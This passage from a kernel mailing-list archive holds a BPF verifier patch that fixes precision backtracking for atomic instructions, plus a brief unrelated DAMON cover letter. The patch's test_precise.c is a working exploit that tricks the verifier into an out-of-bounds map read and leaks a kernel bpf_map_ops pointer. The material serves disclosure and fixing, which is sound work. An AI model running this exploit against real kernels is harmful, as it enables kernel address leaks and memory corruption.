fully patch this bug, we need to know whether the insn->src_reg is an alias of BPF_REG_FP. However, it might need too much code addition. Or we just do not clear the precision on the src register. # Atomic memory instructions Then, I show that the backtracking on atomic load and store is also flawed. As shown below, when the backtrack_insn() function in the verifier meets store instructions, it checks if the stack slot is set with precision or not. If not, just return. if (!bt_is_slot_set(bt, spi)) return 0; bt_clear_slot(bt, spi); if (class == BPF_STX) bt_set_reg(bt, sreg); Assume we have an atomic_fetch_or instruction (tools/testing/selftests/bpf/verifier/atomic_precision.c) shown below. 7: (4c) w7 |= w3 mark_precise: frame1: last_idx 7 first_idx 0 subseq_idx -1 mark_precise: frame1: regs=r7 stack= before 6: (c3) r7 = atomic_fetch_or((u32 *)(r10 -120), r7) mark_precise: frame1: regs=r7 stack= before 5: (bf) r7 = r10 mark_precise: frame1: regs=r10 stack= before 4: (7b) *(u64 *)(r3 -120) = r1 mark_precise: frame1: regs=r10 stack= before 3: (bf) r3 = r10 mark_precise: frame1: regs=r10 stack= before 2: (b7) r1 = 1000 mark_precise: frame1: regs=r10 stack= before 0: (85) call pc+1 BUG regs 400 Before backtracking to it, r7 has already been marked as precise. Since the value of r7 after atomic_fecth_or comes from r10-120, it should propagate the precision to r10-120. However, because the stack slot r10-120 is not marked, it doesn't satisfy bt_is_slot_set(bt, spi) condition shown above. Finally, it just returns without marking r10-120 as precise. This bug can lead to the verifier's assertion as well: "[ 1510.165537] verifier backtracking bug [ 1510.165582] WARNING: CPU: 2 PID: 382 at kernel/bpf/verifier.c:3626 __mark_chain_precision+0x4568/0x4e50" I've attached the patch for correctly propagating the precision on atomic instructions. But it still can't solve the problem that the stack slot is expressed with other registers instead of r10. Signed-off-by: Tao Lyu <tao.lyu(a)epfl.ch> --- kernel/bpf/verifier.c | 58 +++++- tools/testing/selftests/bpf/Makefile | 6 +- tools/testing/selftests/bpf/test_precise.c | 186 ++++++++++++++++++ .../selftests/bpf/verifier/atomic_precision.c | 19 ++ 4 files changed, 263 insertions(+), 6 deletions(-) create mode 100644 tools/testing/selftests/bpf/test_precise.c create mode 100644 tools/testing/selftests/bpf/verifier/atomic_precision.c diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c index e777f50401b6..4e86cd2cadd3 100644 --- a/kernel/bpf/verifier.c +++ b/kernel/bpf/verifier.c @@ -3495,6 +3495,7 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx, int subseq_idx, u32 dreg = insn->dst_reg; u32 sreg = insn->src_reg; u32 spi, i; + u32 set_spi, set_sreg; if (insn->code == 0) return 0; @@ -3512,6 +3513,11 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx, int subseq_idx, if (!bt_is_reg_set(bt, dreg)) return 0; if (opcode == BPF_MOV) { + if (dreg == BPF_REG_FP || sreg == BPF_REG_FP) { + verbose(env, "BUG: backtracking to r10\n"); + WARN_ONCE(1, "verifier backtracking bug"); + return -EFAULT; + } if (BPF_SRC(insn->code) == BPF_X) { /* dreg = sreg or dreg = (s8, s16, s32)sreg * dreg needs precision after this insn @@ -3580,11 +3586,53 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx, int subseq_idx, WARN_ONCE(1, "verifier backtracking bug"); return -EFAULT; } - if (!bt_is_slot_set(bt, spi)) - return 0; - bt_clear_slot(bt, spi); - if (class == BPF_STX) - bt_set_reg(bt, sreg); + if (BPF_MODE(insn->code) == BPF_ATOMIC) { + switch (insn->imm) { + case BPF_ADD: + case BPF_AND: + case BPF_OR: + case BPF_XOR: + if (bt_is_slot_set(bt, spi)) { + bt_set_reg(bt, sreg); + } + break; + case BPF_ADD | BPF_FETCH: + case BPF_AND | BPF_FETCH: + case BPF_OR | BPF_FETCH: + case BPF_XOR | BPF_FETCH: + set_spi = bt_is_reg_set(bt, sreg); + set_sreg = bt_is_slot_set(bt, spi); + if (set_spi) { + bt_set_slot(bt, spi); + bt_clear_reg(bt, sreg); + } + if (set_sreg) { + bt_set_slot(bt, spi); + bt_set_reg(bt, sreg); + } + break; + case BPF_XCHG: + case BPF_CMPXCHG: + if (bt_is_reg_set(bt, sreg) && bt_is_slot_set(bt, spi)) + return 0; + else if (bt_is_reg_set(bt, sreg)) { + bt_set_slot(bt, spi); + bt_clear_reg(bt, sreg); + } else if (bt_is_slot_set(bt, spi)) { + bt_set_reg(bt, sreg); + bt_clear_slot(bt, spi); + } else { + return 0; + } + break; + } + } else { + if (!bt_is_slot_set(bt, spi)) + return 0; + bt_clear_slot(bt, spi); + if (class == BPF_STX) + bt_set_reg(bt, sreg); + } } else if (class == BPF_JMP || class == BPF_JMP32) { if (bpf_pseudo_call(insn)) { int subprog_insn_idx, subprog; diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile index 4225f975fce3..2d3d2d6b159b 100644 --- a/tools/testing/selftests/bpf/Makefile +++ b/tools/testing/selftests/bpf/Makefile @@ -53,7 +53,8 @@ TEST_GEN_PROGS = test_verifier test_tag test_maps test_lru_map test_lpm_map test test_sock test_sockmap get_cgroup_id_user \ test_cgroup_storage \ test_tcpnotify_user test_sysctl \ - test_progs-no_alu32 + test_progs-no_alu32 \ + test_precise TEST_INST_SUBDIRS := no_alu32 # Also test bpf-gcc, if present @@ -647,6 +648,9 @@ $(OUTPUT)/test_verifier: test_verifier.c verifier/tests.h $(BPFOBJ) | $(OUTPUT) $(call msg,BINARY,,$@) $(Q)$(CC) $(CFLAGS) $(filter %.a %.o %.c,$^) $(LDLIBS) -o $@ +$(OUTPUT)/test_precise: test_precise.c + $(Q)$(CC) $(CFLAGS) $(filter %.a %.o %.c,$^) -o $@ + # Include find_bit.c to compile xskxceiver. EXTRA_SRC := $(TOOLSDIR)/lib/find_bit.c $(OUTPUT)/xskxceiver: $(EXTRA_SRC) xskxceiver.c xskxceiver.h $(OUTPUT)/xsk.o $(OUTPUT)/xsk_xdp_progs.skel.h $(BPFOBJ) | $(OUTPUT) diff --git a/tools/testing/selftests/bpf/test_precise.c b/tools/testing/selftests/bpf/test_precise.c new file mode 100644 index 000000000000..8d3fe278579c --- /dev/null +++ b/tools/testing/selftests/bpf/test_precise.c @@ -0,0 +1,186 @@ +#include <linux/bpf.h> +#include <errno.h> +#include <string.h> +#include <stdio.h> +#include <unistd.h> +#include <sys/syscall.h> +#include <sys/socket.h> +#include <netinet/in.h> +#include "../../../include/linux/filter.h" + +char logbuf[1024*1024]; +char data_in[1024], data_out[1024], ctx_in[1024], ctx_out[1024]; +extern int errno; + +static int setup_listener_sock(); +static int setup_send_sock(); + +#define STORAGE_PTR_REG BPF_REG_3 +#define CORRUPTED_PTR_REG BPF_REG_4 +#define SPECIAL_VAL_REG BPF_REG_5 +#define LEAKED_VAL_REG BPF_REG_8 + +#define STORAGE_MAP_SIZE (8192) + +int main(){ + + // Create map for out-of-bound access + unsigned long long key = 0; + union bpf_attr corrupt_map = { + .map_type = BPF_MAP_TYPE_ARRAY, + .key_size = 4, + .value_size = STORAGE_MAP_SIZE, + .max_entries = 1, + }; + + strcpy(corrupt_map.map_name, "corrupt_map"); + int corrupt_map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &corrupt_map, sizeof(corrupt_map)); + if (corrupt_map_fd < 0) + return 0; + + // Set up the second, valid map in which we can store information + key = 0; + union bpf_attr storage_map = { + .map_type = BPF_MAP_TYPE_ARRAY, + .key_size = 4, + .value_size = STORAGE_MAP_SIZE, + .max_entries = 1 + }; + strcpy(storage_map.map_name, "storage_map"); + int storage_map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &storage_map, sizeof(corrupt_map)); + if (storage_map_fd < 0) { + return 0; + } + + + struct bpf_insn progBytecode[] = { + BPF_MOV64_IMM(BPF_REG_2, 1000), + BPF_MOV64_REG(BPF_REG_3, BPF_REG_10), + BPF_ALU64_IMM(BPF_DIV, BPF_REG_2, 3), + BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0, 2), + BPF_ST_MEM(BPF_DW, BPF_REG_3, -120, 200), + BPF_JMP_IMM(BPF_JA, 0, 0, 1), + BPF_ST_MEM(BPF_DW, BPF_REG_3, -120, -0x110), + BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_3, -120), + /* Load the corrupt map */ + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), + BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), + BPF_LD_MAP_FD(BPF_REG_1, corrupt_map_fd), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), + BPF_EXIT_INSN(), + // Trigger arbitrary read/write + BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), + BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6), + // Access map-0x110 + BPF_LDX_MEM(BPF_DW, LEAKED_VAL_REG, BPF_REG_7, 0), + // Save the leaked bpf_map_ops into the second map + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), + BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), + BPF_LD_MAP_FD(BPF_REG_1, storage_map_fd), + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), + BPF_EXIT_INSN(), + BPF_MOV64_REG(STORAGE_PTR_REG, BPF_REG_0), + BPF_STX_MEM(BPF_DW, STORAGE_PTR_REG, LEAKED_VAL_REG, 0), + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_EXIT_INSN(), +}; + + union bpf_attr progAttr; + memset(&progAttr, 0, sizeof(progAttr)); + progAttr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER; + progAttr.license = (__u64)"Dual BSD/GPL"; + progAttr.log_level = 2; + progAttr.log_size = 1024*1024; + progAttr.log_buf = (__u64)logbuf; + progAttr.insns = (__u64)progBytecode; + progAttr.insn_cnt = sizeof(progBytecode)/sizeof(struct bpf_insn); + progAttr.prog_flags = BPF_F_TEST_RND_HI32|BPF_F_TEST_STATE_FREQ; + + errno = 0; + int fd = syscall(SYS_bpf, 0x5, &progAttr, sizeof(progAttr)); + printf("%s\n%s\n", logbuf, strerror(errno)); + + /* + union bpf_attr attr; + memset(&attr, 0, sizeof(attr)); + attr.test.prog_fd = fd; + attr.test.data_size_in = sizeof(data_in); + attr.test.data_size_out = sizeof(data_out); + attr.test.data_in = (__aligned_u64)data_in; + attr.test.data_out = (__aligned_u64)data_out; + errno = 0; + int ret = syscall(SYS_bpf, 10, &attr, sizeof(attr)); + printf("BPF_PROG_TEST_RUN returns %d, %s, fd:%d\n", ret, strerror(errno), fd); + */ + + int listener_sock = setup_listener_sock(); + int send_sock = setup_send_sock(); + if (listener_sock < 0 || send_sock < 0) { + return 0; + } + if (setsockopt(listener_sock, SOL_SOCKET, SO_ATTACH_BPF, &fd, + sizeof(fd)) < 0) { + return 0; + } + // trigger execution by connecting to the listener socket + struct sockaddr_in serverAddr; + serverAddr.sin_family = AF_INET; + serverAddr.sin_port = htons(1337); + serverAddr.sin_addr.s_addr = htonl(INADDR_ANY); + // no need to check connect, it will fail anyways + connect(send_sock, (struct sockaddr *)&serverAddr, sizeof(serverAddr)); + close(listener_sock); + close(send_sock); + + unsigned long lk[STORAGE_MAP_SIZE / sizeof(long long)]; + memset(lk, 0, sizeof(lk)); + key = 0; + union bpf_attr lookup_map = { + .map_fd = storage_map_fd, + .key = (unsigned long long)&key, + .value = (unsigned long long)&lk + }; + int err = syscall(SYS_bpf, BPF_MAP_LOOKUP_ELEM, &lookup_map, sizeof(lookup_map)); + if (err < 0) { + return 0; + } + + printf("storage map value: %lx\n", *lk); + return 0; +} + +static int setup_listener_sock() +{ + int sock_fd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC, 0); + if (sock_fd < 0) { + return sock_fd; + } + + struct sockaddr_in serverAddr; + serverAddr.sin_family = AF_INET; + serverAddr.sin_port = htons(1337); + serverAddr.sin_addr.s_addr = htonl(INADDR_ANY); + + int err = bind(sock_fd, (struct sockaddr *)&serverAddr, sizeof(serverAddr)); + if (err < 0) + return err; + + err = listen(sock_fd, 32); + if (err < 0) + return err; + + return sock_fd; +} + + +static int setup_send_sock() +{ + return socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); +} + diff --git a/tools/testing/selftests/bpf/verifier/atomic_precision.c b/tools/testing/selftests/bpf/verifier/atomic_precision.c new file mode 100644 index 000000000000..49ebf97a03e8 --- /dev/null +++ b/tools/testing/selftests/bpf/verifier/atomic_precision.c @@ -0,0 +1,19 @@ +{ + "atomic_fetch_or: precision marking test", + .insns = { + BPF_CALL_REL(1), + BPF_EXIT_INSN(), + BPF_MOV64_IMM(BPF_REG_1, 1000), + BPF_MOV64_REG(BPF_REG_3, BPF_REG_10), + BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_1, -120), + BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), + BPF_ATOMIC_OP(BPF_W, BPF_OR | BPF_FETCH, BPF_REG_10, BPF_REG_7, -120), + BPF_ALU32_REG(BPF_OR, BPF_REG_7, BPF_REG_3), + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_EXIT_INSN(), + }, + .result = REJECT, + .errstr = "R7 32-bit pointer arithmetic prohibited", + .result_unpriv = REJECT, + .errstr_unpriv = "loading/calling other bpf or kernel functions are allowed for CAP_BPF and CAP_SYS_ADMIN", +}, -- 2.25.1

1 year, 8 months

2
3
0 0

[PATCH 0/2] mm/damon/sysfs: fix unexpected targets adding bug

by SeongJae Park

The sysfs code for online targets updating can result in adding more than expected monigoring targets to the context. It can result in unexpected amount of memory consumption and monitoring overhead. This patchset fixes the issue (patch 1), and add a kunit test for avoiding similar bug of future (patch 2). SeongJae Park (2): mm/damon/sysfs: remove requested targets when online-commit inputs mm/damon/sysfs-test: add a unit test for damon_sysfs_set_targets() mm/damon/Kconfig | 12 ++++++ mm/damon/sysfs-test.h | 86 +++++++++++++++++++++++++++++++++++++++++++ mm/damon/sysfs.c | 52 ++++++-------------------- 3 files changed, 109 insertions(+), 41 deletions(-) create mode 100644 mm/damon/sysfs-test.h base-commit: 9a969da6ffb9609f5fa8d0b7fdc6859c37a10335 -- 2.34.1

1 year, 8 months

1
1
0 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

Linux-kselftest-mirror October 2023